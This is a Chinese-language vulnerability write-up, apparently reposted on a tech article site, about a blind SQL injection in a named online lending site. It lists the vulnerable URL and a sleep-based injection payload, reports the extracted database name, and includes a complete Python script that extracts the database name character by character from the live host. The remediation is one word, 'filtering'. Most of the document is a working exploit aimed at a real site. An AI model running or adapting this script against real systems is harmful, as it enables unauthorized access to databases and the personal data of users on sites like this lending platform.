贷蚂蚁主站sql盲注漏洞
url:http://www.daimayi.com/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/1
这里存在sql注入.
payload:if(ascii(substring(database(),%s,1))=%s),1,sleep(5))
该处因为如果将sleep放在中间会导致直接允许非常长的时间,或者504,所以我将sleep放在最后,然后通过判断页面响应内容中是否存在关键字即可。这里选取关键字 1140.00
注入:
database:huomayi
python 脚本:
#encoding=gbk
import httplib
import time
import string
import sys
import random
import urllib
headers = {
'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1',
}
payloads = list(string.ascii_lowercase)
for i in range(0,10):
payloads.append(str(i))
payloads += ['@','_', '.', '-', '\\', ' ']
print 'Try to retrive database:'
for i in range(1,11):
for payload in payloads:
try:
conn = httplib.HTTPConnection('www.daimayi.com', timeout=5)
s = "if(ascii(substring(database(),%s,1))=%s,1,sleep(5))" % (i, ord(payload))
params = urllib.quote(s)
conn.request(method='GET', url= '/index.php/Loan/index/s/1/money/1/deadline/1/lt/1/co_id/' + params,
headers = headers)
html_doc = conn.getresponse().read()
#print html_doc
verfy = "1140.00"
if verfy in html_doc:
print payload
break
else:
pass
except Exception, e:
pass
print "Done"
解决方案:
过滤
- 上一篇:sqlserver2008出现远程过程调用失败
- 下一篇:软链接与硬链接的区别
相关文章
图文推荐
- 文章
- 推荐
- 热门新闻